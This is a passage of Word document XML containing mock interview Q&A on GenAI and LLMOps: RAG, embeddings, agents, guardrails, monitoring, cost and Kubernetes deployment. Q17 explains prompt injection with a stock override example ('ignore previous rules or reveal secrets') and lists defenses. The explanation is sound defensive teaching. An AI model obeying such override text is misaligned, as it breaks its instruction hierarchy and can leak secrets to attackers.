    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build a secure internal API platform with authentication through the company identity provider, authorization based on roles and scopes, audit logs for every automation action, and approval controls for risky operations. The API would expose only approved workflows, validate inputs strictly, run long tasks asynchronously through a queue or job runner, and store job state in a database. It would run on Kubernetes or Cloud Run with CI/CD, immutable images, probes, autoscaling, structured logs, metrics, traces, dashboards, alerts, and rollback. For DevOps automation, least-privilege runtime identity and clear auditability are as important as the API code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 76 - GenAI and LLMOps Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Generative AI and how is it different from traditional machine learning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Generative AI creates new content such as text, code, images, summaries, or answers. Traditional machine learning often predicts a label, score, class, or numeric value from structured inputs. For example, a traditional ML model may predict whether an alert is high risk, while a GenAI system may summarize an incident, draft a runbook, or answer questions from documentation. In production, GenAI still needs the same engineering discipline: security, evaluation, monitoring, cost control, latency management, and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is an LLM and how does it generate responses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An LLM, or Large Language Model, is a model trained on large amounts of text and code to predict and generate sequences of tokens. When we send a prompt, the model converts text into tokens, uses learned patterns and context to estimate likely next tokens, and generates a response step by step. It does not truly know facts like a database; it generates based on learned probability and provided context. That is why grounding, retrieval, validation, and evaluation are important in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What practical GenAI use cases have you seen for DevOps, SRE, or platform engineering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Useful GenAI use cases for DevOps and SRE include incident summarization, log explanation, runbook search, Kubernetes troubleshooting assistants, Terraform review helpers, CI/CD failure summarization, security finding explanation, pull request summaries, cloud cost analysis summaries, and internal platform support chatbots. I would start with low-risk assistive workflows where a human reviews the output, then move toward controlled automation only after strong evaluation, access control, and audit logging are in place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is RAG and why do we use it with LLM applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RAG means Retrieval-Augmented Generation. It combines information retrieval with LLM generation. Instead of asking the model to answer only from memory, the application retrieves relevant documents, runbooks, tickets, code snippets, or knowledge-base content and passes that context to the model. We use RAG to make answers more grounded, current, domain-specific, and explainable. For enterprise use, RAG is often safer and cheaper than fine-tuning for knowledge-heavy question answering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain the end-to-end flow of a RAG application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A RAG flow has two main paths: ingestion and query. During ingestion, documents are collected, cleaned, chunked, converted into embeddings, and stored in a vector database with metadata. During query, the user question is embedded, relevant chunks are retrieved, optionally reranked, and passed to the LLM with instructions. The LLM generates an answer using the retrieved context. In production, I also add access control, citation links, evaluation, cache, logging, tracing, and feedback capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What are embeddings and why are they useful in GenAI systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Embeddings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Embeddings are numeric vector representations of text, code, images, or other content. Similar meanings are placed closer together in vector space. In GenAI systems, embeddings help with semantic search, document retrieval, duplicate detection, clustering, recommendations, and RAG. For example, a user may ask a Kubernetes troubleshooting question in different words, and embeddings can still retrieve the relevant runbook even if exact keywords do not match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is a vector database and when would you use one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Vector DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A vector database stores embeddings and supports similarity search. I would use one when I need semantic retrieval over documents, runbooks, tickets, product docs, source code, or knowledge bases. Examples include Pinecone, Weaviate, Milvus, Chroma, pgvector, Vertex AI Vector Search, and OpenSearch vector search. In production, I care about metadata filtering, access control, indexing strategy, update pipeline, latency, cost, backup, and observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you improve retrieval quality in a RAG system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would improve retrieval by cleaning source documents, choosing good chunk sizes, preserving metadata, using hybrid search with keyword plus vector search, adding reranking, filtering by tenant or document type, and testing different embedding models. I would also evaluate retrieval separately from generation using golden question-answer sets. Poor RAG answers often come from poor retrieval, stale documents, missing metadata, or chunks that are too small or too large.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is prompt engineering and what makes a prompt production-ready?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Prompt Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prompt engineering is designing instructions and context so the model responds in the desired format and behavior. A production-ready prompt is version-controlled, tested, measurable, and constrained. It should define role, task, input format, output format, refusal behavior, citation requirements, and safety rules. I would avoid hidden tribal prompts living only in code. Prompts should go through review, evaluation, rollback, and monitoring like application logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you choose between OpenAI, Gemini, Claude, open-source LLMs, or self-hosted models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Model Selection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would choose based on use case, quality, latency, cost, data privacy, compliance, region availability, context length, tool-calling support, multimodal needs, operational complexity, and vendor risk. Managed APIs are faster to adopt and usually stronger for quality, while open-source or self-hosted models can help with data control, customization, or cost at scale. For production, I would run evaluations against real tasks before deciding, rather than choosing by popularity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is the difference between RAG and fine-tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fine Tuning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RAG provides external knowledge at query time by retrieving relevant context. Fine-tuning changes model behavior or style by training on examples. RAG is better when the knowledge changes often, such as policies, runbooks, product docs, or tickets. Fine-tuning is better when the model needs to follow a specific format, tone, classification behavior, or domain pattern. Many production systems use RAG first, and only fine-tune when evaluation shows a clear need.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What are AI agents and what risks do they introduce in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Agents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AI agents use an LLM to plan steps, call tools, inspect results, and continue until a goal is completed. They can be useful for support workflows, code assistance, or operational investigation, but they introduce risks because the model may choose wrong tools, repeat actions, leak data, or perform unsafe changes. In production, agent tools must be permission-scoped, audited, rate-limited, human-approved for risky operations, and protected with strong guardrails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How does tool calling or function calling work in GenAI applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tool calling allows the model to request a structured function call instead of only generating text. For example, the model can call get_incident_details, search_runbooks, create_ticket, or query_kubernetes_events with typed arguments. The application executes the function and returns results to the model. This pattern is powerful because it connects LLMs to real systems, but it requires validation, authorization, audit logs, timeouts, and safe tool design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you evaluate the quality of an LLM application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would evaluate it at multiple levels: retrieval quality, answer correctness, groundedness, completeness, safety, latency, cost, and user satisfaction. I would build a golden dataset of real user questions and expected answers, run regression tests on prompt or model changes, and use human review for critical workflows. Automated metrics can help, but for enterprise GenAI, human evaluation and task-specific acceptance criteria are very important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is hallucination in LLMs and how would you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Hallucination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hallucination means the model generates an answer that sounds confident but is incorrect or unsupported. I would reduce it by using RAG, requiring citations, instructing the model to say when information is missing, limiting the answer to retrieved context, improving retrieval quality, using lower temperature for factual tasks, and evaluating against known answers. For high-risk workflows, I would keep human approval and avoid letting the model take direct action without verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What safety and guardrail controls would you add to a GenAI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would add input filtering, output filtering, prompt injection detection, sensitive-data redaction, policy checks, role-based access, tenant isolation, citation requirements, refusal rules, audit logs, human approval for risky actions, and monitoring for unsafe or low-confidence outputs. Guardrails should not be only prompt text. They should also exist in application code, gateway controls, retrieval filtering, and tool permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What are prompt injection and data leakage risks in GenAI applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prompt injection happens when a user or document tries to override the system instructions, for example telling the model to ignore previous rules or reveal secrets. Data leakage happens when sensitive information is included in prompts, retrieved context, logs, outputs, or third-party model calls without proper controls. I reduce these risks with retrieval access control, secret redaction, instruction hierarchy, output checks, tool permission boundaries, and careful logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you protect sensitive data when using LLM APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Privacy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would classify data before sending it to an LLM, avoid sending secrets or unnecessary PII, redact sensitive fields, use approved providers and regions, review data retention policies, encrypt data in transit and at rest, and apply access controls. For enterprise systems, I would add audit logs, tenant isolation, DLP checks, and legal/compliance approval. For highly sensitive workloads, I may use a private model endpoint or self-hosted model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How would you design a production architecture for a GenAI chatbot using RAG?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would use a frontend or chat API, backend orchestration service, identity provider, document ingestion pipeline, embedding service, vector database, metadata store, LLM provider, cache, and observability stack. The ingestion pipeline would chunk and embed approved documents with metadata and access rules. At query time, the backend authenticates the user, retrieves only authorized context, reranks results, calls the LLM, returns citations, and logs metrics. Production controls include rate limits, safety filters, cost budgets, fallback behavior, and evaluation pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you design CI/CD for prompts, chains, and GenAI application code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would version prompts, retrieval configuration, chain logic, and application code together. CI should run unit tests, prompt regression tests, golden dataset evaluations, security checks, and cost/latency checks where possible. Deployment should promote changes through environments, compare quality scores, support rollback, and record which prompt/model/index version produced each answer. Prompt changes can break behavior just like code changes, so they need review and release discipline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What should you monitor in a production LLM application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would monitor request volume, latency, token usage, cost, error rate, provider failures, retrieval hit rate, retrieval latency, answer quality feedback, hallucination reports, safety filter triggers, prompt version, model version, cache hit rate, and user satisfaction. For RAG, I also monitor ingestion freshness and vector index health. Logs and traces should include request ID, user or tenant where safe, model, prompt version, retrieved document IDs, and latency breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you control cost for a high-traffic GenAI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would control cost through model selection, prompt size reduction, context trimming, caching, batching where applicable, rate limits, token budgets, user quotas, cheaper models for simple tasks, and routing complex requests to stronger models only when needed. For RAG, I would retrieve fewer but better chunks. I would monitor cost per request, cost by tenant, cost by feature, and alert on anomalies. Cost control should be designed from day one because LLM traffic can become expensive quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you reduce latency in an LLM-powered API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would measure where time is spent: retrieval, reranking, model response, network, or post-processing. Improvements include caching common answers, reducing prompt size, using faster models, streaming responses, optimizing vector search, limiting retrieved chunks, avoiding unnecessary tool calls, colocating services where possible, and using async processing for long workflows. For user experience, streaming partial responses often helps even when total completion time is similar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How would you design fallback and resilience for LLM provider failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would set timeouts, retries with backoff, circuit breakers, fallback models or providers, cached responses for common queries, graceful degradation, and clear user messaging. For critical workflows, I would avoid a single provider dependency. I would monitor provider error rates and latency, and have runbooks for failover. The fallback does not always need equal quality; it needs to keep the product usable and safe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. How would you deploy a GenAI application on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would deploy the GenAI backend as a containerized service with Kubernetes Deployment, Service, Ingress or gateway, ConfigMaps, Secrets, probes, resource limits, HPA, and network policies. If using external model APIs, the app mainly needs secure egress, secrets, and observability. If hosting models, I would design GPU node pools, model server deployment, autoscaling, storage, warmup, and cost controls. I would also run vector database and ingestion jobs with backups and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. How is LLMOps different from traditional MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/MLOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
